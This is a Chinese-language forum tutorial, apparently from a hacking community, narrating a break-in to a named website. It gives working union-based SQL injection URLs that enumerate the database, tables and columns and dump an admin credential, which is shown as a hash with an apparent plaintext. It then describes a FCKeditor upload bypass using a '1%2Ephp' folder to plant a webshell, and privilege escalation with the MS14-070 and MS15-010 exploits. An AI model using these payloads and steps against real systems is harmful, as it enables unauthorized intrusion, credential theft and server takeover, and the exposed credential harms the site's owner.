基础手工注入学习（注入+getshell+提权）

admin

注入篇：

1st. 找注入

Inurl:php id =

就7条结果，挨个试了一下，都是注入。

2nd.注入

基本的还是会一点的。

Order by = 5  显示位为 3 和 4

http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,4,5 from mysql.user

1.判断数据库版本及服务信息

                  首先学了concat()学了函数的使用

Concat()联合数据。和联合函数union不同，union用于联合两条SQL语句，这个用于联合两条数据结果。通常是联合两个字段名，在错误回注入法中，这个函数会联合更复杂的，以后会讲。数据库中管理员通常有登录名和密码等多个字段，用concat轻松一次注入出来。例如concat(username,0x3a,password)，不同字段用逗号,隔开，中间加一个hex编码值。冒号进行hex编码（不知道这个编码的自己Google）得到0x3a，放在concat里面注入以后就显示冒号（自己试验），常用的有0x3a,0x5c,0x5f,0x3c62723e等

放到这个站上，自己把语句整理一下

http://www.chinabaiker.com/text.php?id=-33 union select 1,2,concat(0x64617461626173653A,database(),0x5c,0x757365723A,user(),0x5c,0x7665723A,version()),4,5 from mysql.user

database:daili\user:root@localhost\ver:5.5.20

哎呦？Root权限，不错哦~

[size=10.5000pt]2.爆库

然后下面又学了一个group_concat()函数的使用

group_concat()用法与上面类似，通常格式如下：group_concat(DISTINCT+user,0x3a,password)，group_concat顾名思义，如果管理员账号不止一个的话，concat一次只能注入出来一个，进行依次注入显然太慢，于是使用group_concat把多条数据一次注入出来。DISTINCT我就不赘言了，你自己试验一下或者Google一下就行，很简单。

再放到这个站语句：

http://www.chinabaiker.com/text.php?id=-33 union select 1,2,concat(0x616C6C207461626C65733A,GROUP_CONCAT(DISTINCT+table_schema)),4,5 from information_schema.columns

3.爆表

http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,table_name,5 from (select * from information_schema.tables where table_schema=database() order by table_schema limit 1,1)t limit 1--

4.爆字段

http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,column_name,5 from (select+*+from+information_schema.columns+where+table_name=0x61646D696E（表名hex） and table_schema=database() order by 1 limit 0,1)t limit 1--

后面就简单了，

管理员数据就是admin：3e2f2ce2a16e73b8187548100fc31a3b（gujingming）

以上注入参考文章：

《手工注入php+MySQL参数,技巧和描述》《php+MySql注入非暴力爆数据库表段》《php+MySql注入非暴力爆字段名》《php+MySQL group_concat函数应用（php+MySql高级注入中国龙芯cpu公司网站语句应用一则）》

Getshell篇：

进了后台，翻了翻，很简单，就一个Fck

各种Fck拿shell姿势，试了一遍，都不行。（表弟姿势少，等发达了，去日本学习下）

1.二次上传        X

2.FCK突破建立文件夹          X

3.Burp截断  X

4.FCK构造页面上传  X

然后自己想思路

建立1.php的文件夹，会被执行成1_php，1.php.gif的图会重命名为1_php.gif

那如果吧“.”写成URL的格式呢？

想一下把.写成%2E，能不能行呢？

然后新建了一个文件夹，名称写1%2Ephp

吼吼，果真成功~然后传了一张GIF马子

然后菜刀连接一下，马子就安静地躺在那了。

说实话，以前还真没遇到过这样的情况。头一次。不知道各位表哥有没有遇到过。

提权篇：

Shell在手，天下我有~aspx支持~

D:\RECYCLER\目录有权限

64位2003

首先就试了一下，MS14-070

执行之后半天没有反应，然后更新了一下缓存

然后打开站点看一下，

各位表哥知道原因吗？

表弟统共没提权几次，这次又遇到了这样的情况。不知道怎么解决了。

然后就等，大概等了有20分钟左右，可以打开了。

这次可不敢再用那个exp了。

求助基友了，把shell丢给基友看了下。

基友果断说：MS15-010

“之前法客开着的时候，就听说他是提权帝，今天一看，果真。。。”

后面紧跟一局：单子站什么的自觉发红包

。。。

我是学习的，手注都不会，接毛单。

然后屁颠屁颠去找exp

传上去执行，还是半天没回显，以为又要出事。赶紧打开站看一下，没死~

再回菜刀看一下~whoami

admin

1. 0x64617461626173653A,database(),0x5c,0x757365723A,user(),0x5c,0x7665723A,version()

复制代码

=

1. 0x64617461626173653A = database: ，0x3a = : ,3A = :  ，0x5c = \，

复制代码

ERROR:

好，谢谢站长！ 又学到了很多

路过看看，很不错的教程

感谢分享